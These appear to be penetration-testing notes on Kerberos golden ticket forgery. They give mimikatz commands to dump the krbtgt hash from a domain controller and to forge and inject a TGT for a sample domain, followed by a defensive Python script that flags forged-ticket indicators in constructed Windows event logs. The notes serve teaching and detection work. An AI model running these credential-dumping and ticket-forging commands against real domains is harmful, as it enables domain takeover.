Golden Ticket Forgery

Similar to, but more powerful than, silver ticket forgery. This time we forge a TGT using the krbtgt password hash. We can create a TGT for any user with any groups, even if that user or group membership does not actually exist in the AD database: the TGT trumps the database, and as long as it is valid the KDC will accept it.

First, on the DC, we must dump the hash of krbtgt. We use mimikatz again, but the command differs slightly:

> privilege::debug
> lsadump::lsa /patch

lsadump::lsa /patch targets the LSA secrets and cached credentials.

Now, from any machine (domain joined or not), we can launch mimikatz, create a TGT and inject it into our session. We need the domain SID (see how we obtained it for silver tickets).

> kerberos::purge
> kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt

The created TGT identifies the user as the local admin of the DC and carries a number of powerful groups. Now that the TGT is injected, we start a cmd from mimikatz:

> misc::cmd
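From the defender's side, the property that makes this work (the KDC never issued the TGT, and the account it names need not exist) is also what makes it detectable. The following is an added example, not part of the original notes, that runs a detection pass over constructed Windows Security event records: a 4769 (TGS requested) with no matching 4768 (TGT requested) from the same client within the TGT lifetime, a ticket for an account absent from the directory, and an RC4 (0x17) ticket in a domain expected to use AES. The field names, the directory snapshot in KNOWN_ACCOUNTS, the 10-hour window and the sample events are all assumptions made for the example.

```python
"""Flag Kerberos events that look like a forged TGT (golden ticket).

A forged TGT is never issued by the KDC, so the normal 4768 (TGT requested)
event is missing before the client's 4769 (TGS requested) events, and the
account in the ticket does not have to exist. All input data is constructed.
"""
from datetime import datetime, timedelta

# Constructed Security log events; field names are simplified from the 4768/4769 event data.
SAMPLE_EVENTS = [
    {"time": "2024-01-10T08:00:00", "id": 4768, "user": "alice", "ip": "10.0.0.5", "etype": "0x12"},
    {"time": "2024-01-10T08:00:02", "id": 4769, "user": "alice", "ip": "10.0.0.5",
     "service": "cifs/fs01", "etype": "0x12"},
    # Service tickets requested with a TGT the KDC never handed out (RC4, as produced from an NTLM hash).
    {"time": "2024-01-10T09:15:00", "id": 4769, "user": "jen", "ip": "10.0.0.77",
     "service": "cifs/dc01", "etype": "0x17"},
    {"time": "2024-01-10T09:15:01", "id": 4769, "user": "ghost", "ip": "10.0.0.77",
     "service": "ldap/dc01", "etype": "0x17"},
]

# Constructed snapshot of accounts that exist in the directory.
KNOWN_ACCOUNTS = {"alice", "jen", "krbtgt", "administrator"}

# Assumed maximum TGT lifetime (the default domain policy value is 10 hours).
TGT_WINDOW = timedelta(hours=10)


def _ordered(events):
    """Attach a parsed timestamp to each event and sort chronologically."""
    return sorted(
        ({**e, "ts": datetime.fromisoformat(e["time"])} for e in events),
        key=lambda e: e["ts"],
    )


def find_golden_ticket_indicators(events, known_accounts, window=TGT_WINDOW):
    """Return one finding per suspicious 4769 event, each with its reason codes."""
    known = {a.lower() for a in known_accounts}
    last_tgt = {}  # (user, client ip) -> time of the most recent 4768
    findings = []
    for e in _ordered(events):
        key = (e["user"].lower(), e["ip"])
        if e["id"] == 4768:
            last_tgt[key] = e["ts"]
            continue
        if e["id"] != 4769:
            continue
        reasons = []
        issued = last_tgt.get(key)
        # No TGT was issued to this client for this user within the ticket lifetime.
        if issued is None or e["ts"] - issued > window:
            reasons.append("no_tgt_request")
        # The ticket names an account the directory has never heard of.
        if key[0] not in known:
            reasons.append("unknown_account")
        # RC4-HMAC ticket encryption where AES is expected.
        if e.get("etype") == "0x17":
            reasons.append("rc4_ticket")
        if reasons:
            findings.append({
                "time": e["time"], "user": e["user"], "ip": e["ip"],
                "service": e.get("service"), "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in find_golden_ticket_indicators(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(f"{f['time']} {f['user']}@{f['ip']} -> {f['service']}: {', '.join(f['reasons'])}")
```

The missing-4768 check is the strongest of the three but needs the log window to cover the whole TGT lifetime, and a client that renews or roams between addresses will produce false positives; in practice the DC logs of every KDC must be collected together, since the TGT may have been issued by a different DC than the one serving the TGS request.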
